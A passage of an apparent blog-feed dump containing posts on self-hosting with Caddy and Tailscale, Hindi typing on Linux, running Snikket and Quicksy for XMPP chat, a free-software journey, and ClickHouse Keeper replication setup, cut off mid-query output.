But here, since both are attached to the same network (caddy_public), that is not required anymore.\nThis also means that the only way someone can reach port 8000 on Plausible is via the Caddy container (which is firewall-restricted to Cloudflare IPs).\nThe DB container doesn’t need to be accessed from Caddy at all, so we’ve not attached the web network there.\nHere’s another example of exposing an internal service, which works on the same principles:\n  grafana:\n    image: grafana\u002Fgrafana:8.3.4\n    networks:\n      - monitoring\n      - internal\n\nnetworks:\n  internal:\n    name: caddy_internal\n    external: true\n  monitoring:\n    name: monitoring\nHere, the Grafana container is attached to the caddy_internal network. Since the caddy_internal container only publishes ports on the Tailscale IP, anyone who is not inside the Tailscale network will not be able to access this. Tailscale can do much more by setting up ACL rules per device for each user, but since I am the only user, I’ve not configured ACL rules on it yet.\nHope this approach was simple enough. I follow this pattern across all the applications I self-host, and honestly I’m pretty happy with it.\nFin!",[],{"slug":1764,"title":1765,"link":1766,"pubDate":1767,"contentSnippet":1768,"tags":1769,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"hindi-typing-in-debian-based-distros","Hindi typing in Debian-based distros","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fhindi-typing-in-debian-based-distros\u002F","Mon, 07 Feb 2022 00:00:00 +0000","A few days ago, I was contacted by IT for Change to make a video presentation in Hindi for teachers on the importance of Free Software in education. When I was making slides in LibreOffice Impress, I saw some problems with Hindi typing. First, I was not able to set the input language to Hindi, and second, the fonts in LibreOffice Impress weren’t rendering correctly.\nSo I asked my friend Raghu how to type in Hindi and how to fix the issue, and he helped me. I am documenting my findings here for future reference and to help other people.\nI am using PureOS with KDE right now. The same should work in other GNU\u002FLinux distros too, at least in Debian-based ones.\nTo type in Hindi, go to System Settings -> Input Devices -> Keyboard -> Layouts -> Add layout\nTo add the layout, fill in the following details:\nLimit selection by language: Any language\nLayout: Indian  (They have written ‘Indian’ as a language, which should be ‘Hindi’)\nVariant: default\nLabel: in\nClick ‘Ok’.\nTip: Ctrl + Alt + K is the shortcut for switching the input language.\nThat sets up typing in Hindi.\n\nMapping of inscript Hindi keyboard\n\nNow for the problem of fonts: Raghu suggested I install the fonts-lohit-deva package, which provides the Lohit Devanagari font. After installing, run fc-cache -v | grep lohit to see if lohit is there, as shown below. 
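Concretely, the install-and-verify steps look like this (a small sketch, assuming a Debian-based system with apt):\n$ sudo apt install fonts-lohit-deva\n$ fc-cache -v | grep lohit\n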
If it is there, we are good to go.\nIn LibreOffice Impress, I changed the font to ‘Lohit Devanagari’ and that fixed the problem.\nFinally, I made the slides and recorded the video, which you can watch here.",[],{"slug":1771,"title":1772,"link":1773,"pubDate":1774,"contentSnippet":1775,"tags":1776,"maintainerName":56,"maintainerUsername":57,"maintainerPhoto":58,"feedUrl":59},"index-html-40","How To Be a Totally Natural Conference Speaker?","https:\u002F\u002Fwww.evalapply.org\u002Fposts\u002Fhow-to-give-a-conference-talk\u002Findex.html","Thu, 03 Feb 2022 00:00:00 +0000","Spurred by a conversation with a whip-smart friend and fellow gentlenerd, who unreasonably believed (believes?) they have nothing worth speaking about at the software conferences we like (IN\u002FClojure, FunctionalConf, local meetups etc).",[55,243,1777],"speaking",{"slug":1779,"title":1780,"link":1781,"pubDate":1782,"contentSnippet":1783,"tags":1784,"maintainerName":56,"maintainerUsername":57,"maintainerPhoto":58,"feedUrl":59},"index-html-41","Reframe Technical Debt as Software Debt. Treat it like a AAA-rated CDO.","https:\u002F\u002Fwww.evalapply.org\u002Fposts\u002Fsoftware-debt\u002Findex.html","Thu, 20 Jan 2022 00:00:00 +0000","I've long struggled with the *Technical* Debt metaphor. It was immediately useful when I first heard it. I still think it is useful, albeit as a starting point. The more I worked with software, the more infuriatingly incomplete it started to feel. So I've reframed it as *Software* Debt, for myself. Here's what I'm thinking.",[1785,1346,1786,723,227,530,53,1787,531,1788],"risk","bias","quality","scale",{"slug":1790,"title":1791,"link":1792,"pubDate":1782,"contentSnippet":1793,"tags":1794,"maintainerName":56,"maintainerUsername":57,"maintainerPhoto":58,"feedUrl":59},"index-html-42","How To Not Die By A Thousand Cuts. Or, How To Think About Software Quality.","https:\u002F\u002Fwww.evalapply.org\u002Fposts\u002Fhow-to-not-die-by-a-thousand-cuts\u002Findex.html","Not a weighty meandering 300 page Zen dialogue on Motorcycle Maintenance. Merely a meandering blog post in which one contemplates \u002FQuality\u002F of software products.",[1787,1785,723],{"slug":1796,"title":1797,"link":1798,"pubDate":1782,"contentSnippet":1799,"tags":1800,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"snikket-experience","My Experience of running Snikket","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fsnikket-experience\u002F","What is Snikket?\nSnikket is software that you can install on a server to self-host an XMPP server. Snikket makes some choices on behalf of the person installing it and therefore makes it easy to get the features any XMPP server would usually like to have– audio\u002Fvideo calls, file sharing, etc. It is very convenient to set up and saves time. The downside is that you lose some control over your setup, but you can choose to install plain XMPP on the server if you want more control.\nWhen Praveen told me about Snikket a few days ago, I liked the idea and wanted to try self-hosting it.\nSetting up on the server\nSahil and I first tried to get Snikket running on a server with nginx running on it, but we failed to do so. Snikket’s guide assumes that there is no reverse proxy running on the server. Then I thought that we should try deploying Snikket on a server with no other services running. Sahil gave me access to a server that he was abandoning anyway, with a fresh Debian install on it.
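For the curious, following the guide boils down to roughly this (a from-memory sketch, not the exact steps; the compose file URL and the SNIKKET_DOMAIN\u002FSNIKKET_ADMIN_EMAIL settings should be taken from the official self-hosting guide):\nmkdir snikket && cd snikket\n# download docker-compose.yml from the Snikket self-hosting guide, then\n# create the config file the stack reads its settings from:\ncat > snikket.conf \u003C\u003C'EOF'\nSNIKKET_DOMAIN=chat.example.com        # hypothetical domain\nSNIKKET_ADMIN_EMAIL=admin@example.com  # hypothetical admin contact\nEOF\ndocker-compose up -d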
From there, we followed the Snikket self-hosting guide, which was very simple, and within a few minutes, the server was up and running.\nExperience as a user\nI created an admin invite link for myself. Then I scanned the QR code in the invite link using the Snikket app. The app asked me to set a username and password, after which my account was created and ready to go. Every user on Snikket needs an invite to join. The admin creates an invite link and shares it with the person. The link gives various ways of joining and links to app stores to download the app as well. Then I created an invite link for Sahil. He joined using the Conversations app, which shows that you can use any XMPP app to accept the invite and use your account. We tried texting, file sharing and audio\u002Fvideo calls, and everything worked very well. Snikket gave my server 95% XMPP compliance out of the box, which usually takes a lot of work in plain XMPP, but Snikket made it easy. On this occasion, the founder of the Snikket project, Matt, replied to me on Mastodon reminding us not to take the compliance measure too seriously:\n\nWhile generating the invite link, the admin can choose the circle of the person they are inviting. People joining the same circle are automatically added as contacts. They don’t need to add each other manually. For example, you might have a circle called Family. So, everyone in the Family circle will know each other. You might have a different circle called ‘College’ and so on.\nWhat I like about Snikket is that it is very good quality out of the box. The audio\u002Fvideo call quality is superb, and file sharing is a breeze.\nFurther goals\nThe next step is to configure Snikket on a server running a reverse proxy like nginx. Sahil and I tried but didn’t succeed. If that works out, I can run the server long-term. For now, it is only experimental and temporary.\nGoodbye for now.\nUpdate on May 15 2022\nA week after writing this post, I managed to set up Snikket behind nginx. It’s been almost 5 months now and the service is very smooth. I only had to update once, and that was very easy. I have faced no issues so far on the server side. The uptime has been 100%.\nI found the Snikket project chatroom very helpful and welcoming. They try their best to help newbies with self-hosting, which usually takes a lot of patience.",[],{"slug":1802,"title":1803,"link":1804,"pubDate":1805,"contentSnippet":1806,"tags":1807,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"how-i-got-into-free-software","How I got into Free Software","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fhow-i-got-into-free-software\u002F","Fri, 07 Jan 2022 00:00:00 +0000","Before I forget my journey, I hastily record it here.\nIt was a long series of triggers and questions, raised in my mind after I met Richard Stallman in 2016, that was responsible for this.\nI thought about the issues he raised but didn’t act for years. Occasionally, thoughts about WhatsApp spying on me came to mind. Thoughts about Google recording my whole life. I told one of my friends about Facebook surveillance, and they said they have nothing to hide. I told another friend about Uber tracking us. I told yet another friend about a music app tracking us, and they responded by saying that they used it to their benefit, by getting recommendations related to their music taste. All this time, I didn’t think hard enough.
I merely knew about tracking, and I gave up my rights in exchange for convenience.\nBut many times, Google logged search results which I didn’t want to share with them. The question was: what should I do? What should anyone who doesn’t want to sign some arbitrary terms and conditions, set up by a company that is not even accountable for its actions, do to browse the web? So, I used a proprietary VPN app from the Play Store to “protect” myself. But Google still showed the search results in my profile. Now, I really didn’t want to tell Google where I am or what I search for, but on the other hand, services like Google Search and Google Maps do give convenience. Not having a single person in my immediate friends circle who shared this view also discouraged me constantly, even when I wanted to do something about it.\nDuring this period, I also saw some ads by DuckDuckGo on Quora which constantly reminded me of how pissed off I was with Google and their surveillance. Thanks, DuckDuckGo :)\nThen, in June 2020, my master’s degree ended, and I got some time to think about the issue. I took up the challenge. And that is how it all started. I thought switching a bit of software or using Tor or Brave would give me privacy. I thought I would probably be done in 2-3 days. As it turned out, that thought was really stupid! The so-called Dunning-Kruger effect was at work, which says that beginners in a field of study tend to overestimate their knowledge.\nInitially it started as a challenge and not a quest to change the world or anything. Then I started searching with DuckDuckGo and felt happy about it. It felt cool because nobody I knew had DuckDuckGo as their default search engine. I also used to search Reddit for information on the issue. I came to know about the browser fingerprinting technique used by websites like Google to track users. As depressing as it was, using a VPN does not magically make the user invisible, and there were so many complexities involved in making decisions on how to be private or anonymous.\nI came across Glenn Greenwald’s book ‘No Place To Hide’, about Snowden’s revelations of massive surveillance by the NSA, and read it fully. I felt so much for Snowden. His courage also inspired me. He risked his life to tell the world about the NSA’s secret spying programs. Whenever I talked to someone about the surveillance, they seemed reluctant to change or even admit that there is some threat. And I thought: this person named Snowden risked his whole life by standing up for us against the powerful US Government, while we cannot even give up a few conveniences for our privacy.\nI didn’t have a framework for thinking about how to go about this. I wanted digital privacy, but it is a complicated thing. At that time, I didn’t even think about a threat model. I also used to think, ‘What if the replacement services or software are spying on me? How do I verify that?’\nThis is where I took a page from Richard Stallman’s book; perhaps I took many pages. It occurred to me that if we cannot even inspect what the software does, how can we be sure that the software respects privacy? I realized that users do not control nonfree software. It took some time, but I became convinced that free software is necessary but not sufficient for privacy. So, the replacements I started using, like VLC Media Player and other software, were free software, and this was a big difference. Now I had an answer for why to use this software and how it is different.
At least I was not blindly trusting the software. I also realized that all the freedoms of free software are important, and privacy is not the only issue.\nAt the time, I didn’t have any idea how to think about messenger apps or search engines or anything server-based which you do not even install on your own computer.\nBy September 2020, I had already boycotted most of the software\u002Fservices by Google, Amazon, Microsoft and Facebook, and started using Free Software as much as possible. Back then, I had a MacBook, so boycotting Apple would take more time. In September 2020, I came to know about FSF India and immediately wrote a volunteer request to FSF India. I wanted to meet like-minded people from India. Till that point, I was doing things all alone, by myself. After a few days, Pirate Praveen replied to my volunteer mail. That is how I joined the community and got in touch with others. I also participated in Software Freedom Camp 2020, where I got to meet more people from the free software movement.\nIn the camp, I met many people. Sahil and Arun were in my group, and we had late-night meetings to discuss privacy and teach each other. Later, I met Akhil, Anupa, Bady and Akshay, and then Karthik, who taught me some Hugo and command line.\nAfter interacting with the community, I realized that centralization of services is another problem, and that decentralization and federation of services are necessary for users’ freedom, in addition to free software. That enhanced my thinking, and now I could think about ‘Freedom in the cloud’. I also realized how the free software community works in practice. Earlier, I only knew the philosophy of free software.\nFast-forward to April 2021: I left FSF India due to their support for Richard Stallman when he was re-elected as a board member of the FSF. After that, I focused on campaigning for free software on behalf of the Free Software Community of India (FSCI). I had become an activist by this time. I think the main reason I became an activist is that you cannot use Free Software or have privacy\u002Fanonymity in isolation. Whatever the majority of people use is usually forced upon the minority. Free Software users who care for the philosophy of free software are in the minority, and therefore we have to constantly fight, for example, against the social pressure of using WhatsApp. I also realized that the real way to solve the problem is raising awareness of the issue and helping people switch to Free Software. User boycott of nonfree software is a powerful way to defeat the companies that exploit their users.\nNaturally, I wanted to switch to fully free software, which means not using any proprietary software. I bought a Liberated Computer, which can run exclusively free software, thanks to Abhas. Abhas also taught me how to install a custom ROM on my phone so that I could get rid of proprietary apps. Now I could do my computing without giving away freedom, which is a unique accomplishment in today’s world. This way I switched to free software, and my MacBook passed on to someone else who seems happy to be imprisoned by it (though I am not happy that I did this to someone).\nThanks to all the people who made it possible. First of all, huge thanks to my parents for cooperating (to an extent). Without their support, it wouldn’t have been possible. There are many people who took time and effort to teach me many things. Also, there were already technical solutions for freedom; the Free Software movement has existed for a long time.
Thanks to all the people for their contributions to the software I rely on. Thanks to the Free Software Community.\nI would like to take the opportunity to say that we do not really lack technical solutions for these problems, but rather the willpower to use them.\nIn the end, I would like to say that the journey has not ended; it has only started.",[],{"slug":1809,"title":1810,"link":1811,"pubDate":1812,"contentSnippet":1813,"tags":1814,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"quicksy-app","Quicksy: Privacy with convenience","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fquicksy-app\u002F","Fri, 31 Dec 2021 00:00:00 +0000","What is Quicksy?\nQuicksy app logo\n\nQuicksy is a chat app for Android, available on the Google Play Store and F-Droid.\nQuicksy offers the same convenience, i.e., signup using a phone number, as WhatsApp, Telegram and Signal. Signal respects users’ freedom and privacy, but Quicksy, in addition, is interoperable, while Signal is not. iOS does not have Quicksy, but Monal and Siskin IM on iOS are compatible with Quicksy.\nHere is a video tutorial to get started with Quicksy.\nWelcome screen of Quicksy app\n\nList of a few features of Quicksy:\nAvailable on F-Droid and the Play Store.\nQuicksy supports encryption by default, and due to the source code being available, we can verify that it does encrypt messages (without any cheating!). Encryption means only the users exchanging messages can read them. Quicksy respects users’ privacy in this way. The Quicksy server cannot read your messages.\nOMEMO Encryption in Quicksy app.\n\n\nVery good video\u002Faudio call support.\nVideo calling in Quicksy app. Credits: F-Droid Quicksy page\n\n\nSharing of photos\u002Fvideos\u002Fvoice messages, in encrypted form.\nSharing pictures in Quicksy app.\n\n\n\nIf any of your contacts register with the Quicksy service, then Quicksy automatically detects and shows them in your Quicksy contact list.\nThere are many apps and services compatible with Quicksy, like Conversations, Blabber, Monal, etc., and therefore you are not locked into one service provider, unlike with WhatsApp, Telegram and Signal.\nOne server going down does not mean that all XMPP communication goes down. This is due to the decentralized nature of XMPP, which Quicksy is a part of.\nEasy migration: If Quicksy does something in the future that you do not agree with, you can just use another XMPP service and still be able to talk to your contacts.\nWhy is Quicksy different?\nPopular messenger apps like WhatsApp, Telegram and Signal have the problem that users do not control them. For details, please check this article. WhatsApp uses the control over its users to put them under surveillance. Telegram and Signal are free software but centralized. WhatsApp is nonfree software as well as centralized. Centralized services are easily susceptible to backdoors, can be compromised later on due to changes in the privacy policy or terms and conditions, are easy for governments to ban, etc. The owner of the platform dictates the decisions of a centralized system, so even if it is good for now, it cannot be trusted to remain good forever.\nQuicksy is free\u002Fswatantra\u002Fmukt\u002Flibre software (‘free’ as in freedom) and therefore users can inspect, modify and share the software. If users want to add a feature or fix a problem with the software, they don’t have to beg the developer. In other words, the software is under users’ control.\nQuicksy is a part of the XMPP protocol, which is decentralized and federated.
To understand federation, consider the example of mobile telecom operators. A person using a BSNL SIM can talk to a user with a Vodafone SIM, by call and SMS. WhatsApp, Telegram and Signal do not give you that freedom. All your contacts need to be registered with the same service provider. These apps have a fundamental problem of vendor lock-in – if you uninstall WhatsApp, for example, you lose all your contacts. With federation, it is like changing your SIM. If you have a problem with a telecom operator and you buy a new SIM from another company, you do not lose all your contacts. You can still call and message your earlier contacts. This way, we control our communications rather than relying on a single entity for them.\nLet’s choose Quicksy for a free society rather than being locked in by WhatsApp, Telegram or Signal.\nA word for the Free Software Community\nDear Free Software Community, let’s raise awareness about Quicksy. We don’t have to recommend our geeky solutions to everyone. If some people switch to a free, decentralized and federated app like Quicksy, that is better than them finding XMPP\u002FMatrix\u002FIRC difficult to use and not using anything at all. We need to work to advertise this option and raise awareness about it.\nFurther Reading:\nIntroduction to Free Software.\nWhy Free Software and decentralization are necessary for privacy.\nWhatsApp is malware.\nWhat Does The Facebook Outage Teach Us.\nChoosing a privacy-respecting chatting app.\nReclaim privacy in instant messaging with Free Software and choice of service providers.",[],{"slug":1816,"title":1817,"link":1818,"pubDate":1819,"contentSnippet":1820,"tags":1821,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"clickhouse-replication","Using ClickHouse Keeper for Replication","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fclickhouse-replication\u002F","2021-12-17T02:40:55.000Z","ClickHouse is an extremely performant columnar DB used for fast analytical processing. ClickHouse supports data replication using Apache Zookeeper, which needs to be deployed externally. While Zookeeper works well once you’ve tuned it properly, it is still an additional maintenance overhead. The good news is that you don’t have to worry about this anymore.\nThe ClickHouse 21.12 release announcement mentions ClickHouse Keeper as feature-complete. Keeper is a replacement for Zookeeper, written in C++, and uses the RAFT algorithm for consensus across the different nodes in the cluster. It also has some nice improvements over Zookeeper, such as compressed snapshots\u002Flogs of the state changes in the cluster and the ability to run it inside the server binary itself. I decided to spin up a local ClickHouse cluster and test out the new clickhouse-keeper feature.\nFor our local setup, we’ll set up 4 nodes. We’ll create 2 shards to distribute our data, and each shard will have 2 replicas. The setup looks something like this:\n\nWe need to run clickhouse-keeper on only 3 of these nodes to ensure a quorum: RAFT needs a strict majority of the ensemble to agree, and a 3-node ensemble can still elect a leader after losing one node.
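Before the compose file, it helps to see how this topology is described to ClickHouse. The full configs are in the repo linked at the end; what follows is a sketch of the remote_servers section for the blue\u002Fgreen layout, extrapolated from the orange-shard snippet shown later (the exact file path is an assumption):\ncat > configs\u002Fremote_servers.xml \u003C\u003C'EOF'\n\u003Cclickhouse>\n    \u003Cremote_servers>\n        \u003Cevents>\n            \u003Cshard>\n                \u003Cinternal_replication>true\u003C\u002Finternal_replication>\n                \u003Creplica>\u003Chost>clickhouse-blue-1\u003C\u002Fhost>\u003Cport>9000\u003C\u002Fport>\u003C\u002Freplica>\n                \u003Creplica>\u003Chost>clickhouse-blue-2\u003C\u002Fhost>\u003Cport>9000\u003C\u002Fport>\u003C\u002Freplica>\n            \u003C\u002Fshard>\n            \u003Cshard>\n                \u003Cinternal_replication>true\u003C\u002Finternal_replication>\n                \u003Creplica>\u003Chost>clickhouse-green-1\u003C\u002Fhost>\u003Cport>9000\u003C\u002Fport>\u003C\u002Freplica>\n                \u003Creplica>\u003Chost>clickhouse-green-2\u003C\u002Fhost>\u003Cport>9000\u003C\u002Fport>\u003C\u002Freplica>\n            \u003C\u002Fshard>\n        \u003C\u002Fevents>\n    \u003C\u002Fremote_servers>\n\u003C\u002Fclickhouse>\nEOF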
Here’s a sample docker-compose.yml to spin up these nodes as containers:\nversion: \"3.7\"\n\nx-clickhouse-defaults: &clickhouse-defaults\n  restart: unless-stopped\n  image: yandex\u002Fclickhouse-server:21.12.2.17\n  ulimits:\n    nproc: 65535\n    nofile:\n      soft: 262144\n      hard: 262144\n\nservices:\n  clickhouse-blue-1:\n    \u003C\u003C: *clickhouse-defaults\n    container_name: clickhouse-blue-1\n    hostname: clickhouse-blue-1\n    ports:\n      - 9000:9000\n      - 8123:8123\n      - 9181:9181\n    volumes:\n      - type: volume\n        source: ch-blue-1-data\n        target: \u002Fvar\u002Flib\u002Fclickhouse\n      - \".\u002Fconfigs\u002Fgen\u002Fclickhouse-blue-1:\u002Fetc\u002Fclickhouse-server\u002Fconfig.d\u002F\"\n\n  clickhouse-blue-2:\n    \u003C\u003C: *clickhouse-defaults\n    container_name: clickhouse-blue-2\n    hostname: clickhouse-blue-2\n    ports:\n      - 9001:9000\n      - 8124:8123\n      - 9182:9181\n    volumes:\n      - type: volume\n        source: ch-blue-2-data\n        target: \u002Fvar\u002Flib\u002Fclickhouse\n      - \".\u002Fconfigs\u002Fgen\u002Fclickhouse-blue-2:\u002Fetc\u002Fclickhouse-server\u002Fconfig.d\u002F\"\n\n  clickhouse-green-1:\n    \u003C\u003C: *clickhouse-defaults\n    container_name: clickhouse-green-1\n    hostname: clickhouse-green-1\n    ports:\n      - 9002:9000\n      - 8125:8123\n      - 9183:9181\n    volumes:\n      - type: volume\n        source: ch-green-1-data\n        target: \u002Fvar\u002Flib\u002Fclickhouse\n      - \".\u002Fconfigs\u002Fgen\u002Fclickhouse-green-1:\u002Fetc\u002Fclickhouse-server\u002Fconfig.d\u002F\"\n\n  clickhouse-green-2:\n    \u003C\u003C: *clickhouse-defaults\n    container_name: clickhouse-green-2\n    hostname: clickhouse-green-2\n    ports:\n      - 9003:9000\n      - 8126:8123\n      - 9184:9181\n    volumes:\n      - type: volume\n        source: ch-green-2-data\n        target: \u002Fvar\u002Flib\u002Fclickhouse\n      - \".\u002Fconfigs\u002Fgen\u002Fclickhouse-green-2:\u002Fetc\u002Fclickhouse-server\u002Fconfig.d\u002F\"\n\nvolumes:\n  ch-blue-1-data:\n  ch-blue-2-data:\n  ch-green-1-data:\n  ch-green-2-data:\nclickhouse-keeper runs only if the \u003Ckeeper_server> section is present inside the config.
Here’s a sample config:\n\u003Cclickhouse>\n    \u003Ckeeper_server>\n        \u003Ctcp_port>9181\u003C\u002Ftcp_port>\n        \u003Cserver_id>${SERVER_ID}\u003C\u002Fserver_id>\n        \u003Clog_storage_path>\u002Fvar\u002Flib\u002Fclickhouse\u002Fcoordination\u002Flog\u003C\u002Flog_storage_path>\n        \u003Csnapshot_storage_path>\u002Fvar\u002Flib\u002Fclickhouse\u002Fcoordination\u002Fsnapshots\u003C\u002Fsnapshot_storage_path>\n\n        \u003Ccoordination_settings>\n            \u003Coperation_timeout_ms>10000\u003C\u002Foperation_timeout_ms>\n            \u003Csession_timeout_ms>30000\u003C\u002Fsession_timeout_ms>\n            \u003Craft_logs_level>trace\u003C\u002Fraft_logs_level>\n        \u003C\u002Fcoordination_settings>\n\n        \u003Craft_configuration>\n            \u003Cserver>\n                \u003Cid>1\u003C\u002Fid>\n                \u003Chostname>clickhouse-blue-1\u003C\u002Fhostname>\n                \u003Cport>9234\u003C\u002Fport>\n            \u003C\u002Fserver>\n            \u003Cserver>\n                \u003Cid>2\u003C\u002Fid>\n                \u003Chostname>clickhouse-blue-2\u003C\u002Fhostname>\n                \u003Cport>9234\u003C\u002Fport>\n            \u003C\u002Fserver>\n            \u003Cserver>\n                \u003Cid>3\u003C\u002Fid>\n                \u003Chostname>clickhouse-green-1\u003C\u002Fhostname>\n                \u003Cport>9234\u003C\u002Fport>\n            \u003C\u002Fserver>\n        \u003C\u002Fraft_configuration>\n    \u003C\u002Fkeeper_server>\n\u003C\u002Fclickhouse>\nThere are some other configs required for Clickhouse to discover other nodes and enable replication. You can find a working example in this repo.\nVerifying Cluster State#\nOnce the containers are configured and running, we can verify if the replication is working as intended:\nLet’s first check if the keeper daemon is running by:\necho ruok | nc 127.0.0.1 9181\nimok\nruok is a part of Four Letter Commands that are mostly used to diagnose Keeper’s client\u002Fserver.\nTo ensure that clickhouse-server is aware of the keeper cluster, we can query the system.zookeeper table:\nSELECT *\nFROM system.zookeeper\nWHERE path = '\u002F'\nFORMAT Vertical\n\nQuery id: 287d3c2d-b93f-4d48-b335-6df2f89a8ab3\n\nRow 1:\n──────\nname:           clickhouse\nvalue:          \nczxid:          3\nmzxid:          3\nctime:          2021-12-17 09:11:05\nmtime:          2021-12-17 09:11:05\nversion:        0\ncversion:       1\naversion:       0\nephemeralOwner: 0\ndataLength:     0\nnumChildren:    1\npzxid:          4\npath:           \u002F\nIf you don’t see any results in the system.zookeeper table, then re-check if zookeeper section is present inside the config. This config tells ClickHouse how to discover keeper nodes.\nWe can also see if our cluster is configured correctly with:\nSELECT\n    host_name,\n    host_address,\n    replica_num\nFROM system.clusters\nWHERE cluster = 'events'\n\nQuery id: a4bacfa1-d3aa-482f-b8b2-30b05442a173\n\n┌─host_name──────────┬─host_address─┬─replica_num─┐\n│ clickhouse-blue-1  │ 172.19.0.5   │           1 │\n│ clickhouse-blue-2  │ 172.19.0.3   │           2 │\n│ clickhouse-green-1 │ 172.19.0.4   │           1 │\n│ clickhouse-green-2 │ 172.19.0.2   │           2 │\n└────────────────────┴──────────────┴─────────────┘\n(Here events is our cluster name specified in the remote_servers section of the config.)\nInserting Sample Data#\nLet’s create a DB and add some data to the DB. 
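Aside: since each node publishes ClickHouse’s native TCP port on a different host port, you can point clickhouse-client at any individual node from the host. A quick sketch using the port mappings from the compose file above:\nclickhouse-client --host 127.0.0.1 --port 9000 --query 'SELECT hostName()'   # clickhouse-blue-1\nclickhouse-client --host 127.0.0.1 --port 9002 --query 'SELECT hostName()'   # clickhouse-green-1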
We need to ensure that our data is split across shards and we can query all shards using a central view.\nCluster Schema#\nCREATE DATABASE app ON CLUSTER 'events';\n\nCREATE TABLE app.events_local ON CLUSTER '{cluster}' (\n    time DateTime,\n    event_id  Int32,\n    uuid UUID\n)\nENGINE = ReplicatedMergeTree('\u002Fclickhouse\u002Ftables\u002F{cluster}\u002F{shard}\u002F{table}', '{replica}')\nPARTITION BY toYYYYMM(time)\nORDER BY (event_id);\n\nCREATE TABLE app.events_main ON CLUSTER '{cluster}' AS app.events_local\nENGINE = Distributed('{cluster}', app, events_local, rand());\nWhat’s happening here:\nWe’ll create a sample database app with a single table events_local.\nWe’re using ReplicatedMergeTree here as that tells ClickHouse to automatically replicate the data inside the table when it’s inserted.\n\nProperties like cluster\u002Fshard\u002Freplica are automatically populated from the server’s macros. It’s a handy feature that allows you to execute this command just once on the cluster and it automatically populates the relevant config in each server.\nFinally we create a  Distributed table to perform our INSERT\u002FSELECT operations in a central place. It’s possible to manually insert data to particular replicas, but since Clickhouse supports load balancing across shards, it’s preferred to create a table with a Distributed engine and let that happen automatically.\n\nWrite operations can be sharded based on a particular column name, but here we are simply using the rand() function, which splits the write randomly to different shards.\nAll read operations are parallelized and Clickhouse selects one replica from each shard to query the data from.\nWe use ON CLUSTER keyword to indicate that this query has to be run on all servers which are part of the cluster events.\nIt’s now time to insert some random data, for which you can use this command:\nINSERT INTO app.events_main VALUES (now(), rand(1), generateUUIDv4());\nWe can now query the table and see if our records are present:\nSELECT *\nFROM app.events_main\n\n┌────────────────time─┬───event_id─┬─uuid─────────────────────────────────┐\n│ 2021-12-17 09:36:17 │ 1888949839 │ 3c33305e-8ea0-4ac1-a07a-667465ec9a85 │\n└─────────────────────┴────────────┴──────────────────────────────────────┘\n┌────────────────time─┬───event_id─┬─uuid─────────────────────────────────┐\n│ 2021-12-17 09:36:16 │ -689113926 │ 2a944d71-73f3-4491-b851-4f0e6f296e44 │\n└─────────────────────┴────────────┴──────────────────────────────────────┘\n┌────────────────time─┬──event_id─┬─uuid─────────────────────────────────┐\n│ 2021-12-17 09:36:15 │ 415899002 │ 5980299f-1594-4c17-8eb5-e512f15ecf34 │\n└─────────────────────┴───────────┴──────────────────────────────────────┘\n┌────────────────time─┬───event_id─┬─uuid─────────────────────────────────┐\n│ 2021-12-17 09:36:16 │ 1303963476 │ 0b27d5bd-6315-4937-82a4-18199e5eebb7 │\n└─────────────────────┴────────────┴──────────────────────────────────────┘\nNow, you must be wondering how to check if the data is replicated and how the data is distributed across our shards. 
For that, we can use the handy remote() function:\nSELECT *\nFROM\n(\n    SELECT\n        hostName(),\n        *\n    FROM remote('172.20.0.2', 'app', 'events_local')\n    UNION ALL\n    SELECT\n        hostName(),\n        *\n    FROM remote('172.20.0.3', 'app', 'events_local')\n    UNION ALL\n    SELECT\n        hostName(),\n        *\n    FROM remote('172.20.0.4', 'app', 'events_local')\n    UNION ALL\n    SELECT\n        hostName(),\n        *\n    FROM remote('172.20.0.5', 'app', 'events_local')\n)\n\nQuery id: 34a81447-a31b-4915-9bd8-7a6e17bb0860\n\n┌─hostName()────────┬────────────────time─┬───event_id─┬─uuid─────────────────────────────────┐\n│ clickhouse-blue-2 │ 2021-12-17 09:36:17 │ 1888949839 │ 3c33305e-8ea0-4ac1-a07a-667465ec9a85 │\n└───────────────────┴─────────────────────┴────────────┴──────────────────────────────────────┘\n┌─hostName()────────┬────────────────time─┬───event_id─┬─uuid─────────────────────────────────┐\n│ clickhouse-blue-1 │ 2021-12-17 09:36:17 │ 1888949839 │ 3c33305e-8ea0-4ac1-a07a-667465ec9a85 │\n└───────────────────┴─────────────────────┴────────────┴──────────────────────────────────────┘\n┌─hostName()─────────┬────────────────time─┬──event_id─┬─uuid─────────────────────────────────┐\n│ clickhouse-green-2 │ 2021-12-17 09:36:15 │ 415899002 │ 5980299f-1594-4c17-8eb5-e512f15ecf34 │\n└────────────────────┴─────────────────────┴───────────┴──────────────────────────────────────┘\n┌─hostName()─────────┬────────────────time─┬───event_id─┬─uuid─────────────────────────────────┐\n│ clickhouse-green-2 │ 2021-12-17 09:36:16 │ -689113926 │ 2a944d71-73f3-4491-b851-4f0e6f296e44 │\n└────────────────────┴─────────────────────┴────────────┴──────────────────────────────────────┘\n┌─hostName()─────────┬────────────────time─┬───event_id─┬─uuid─────────────────────────────────┐\n│ clickhouse-green-2 │ 2021-12-17 09:36:16 │ 1303963476 │ 0b27d5bd-6315-4937-82a4-18199e5eebb7 │\n└────────────────────┴─────────────────────┴────────────┴──────────────────────────────────────┘\n┌─hostName()─────────┬────────────────time─┬───event_id─┬─uuid─────────────────────────────────┐\n│ clickhouse-green-1 │ 2021-12-17 09:36:16 │ 1303963476 │ 0b27d5bd-6315-4937-82a4-18199e5eebb7 │\n└────────────────────┴─────────────────────┴────────────┴──────────────────────────────────────┘\n┌─hostName()─────────┬────────────────time─┬──event_id─┬─uuid─────────────────────────────────┐\n│ clickhouse-green-1 │ 2021-12-17 09:36:15 │ 415899002 │ 5980299f-1594-4c17-8eb5-e512f15ecf34 │\n└────────────────────┴─────────────────────┴───────────┴──────────────────────────────────────┘\n┌─hostName()─────────┬────────────────time─┬───event_id─┬─uuid─────────────────────────────────┐\n│ 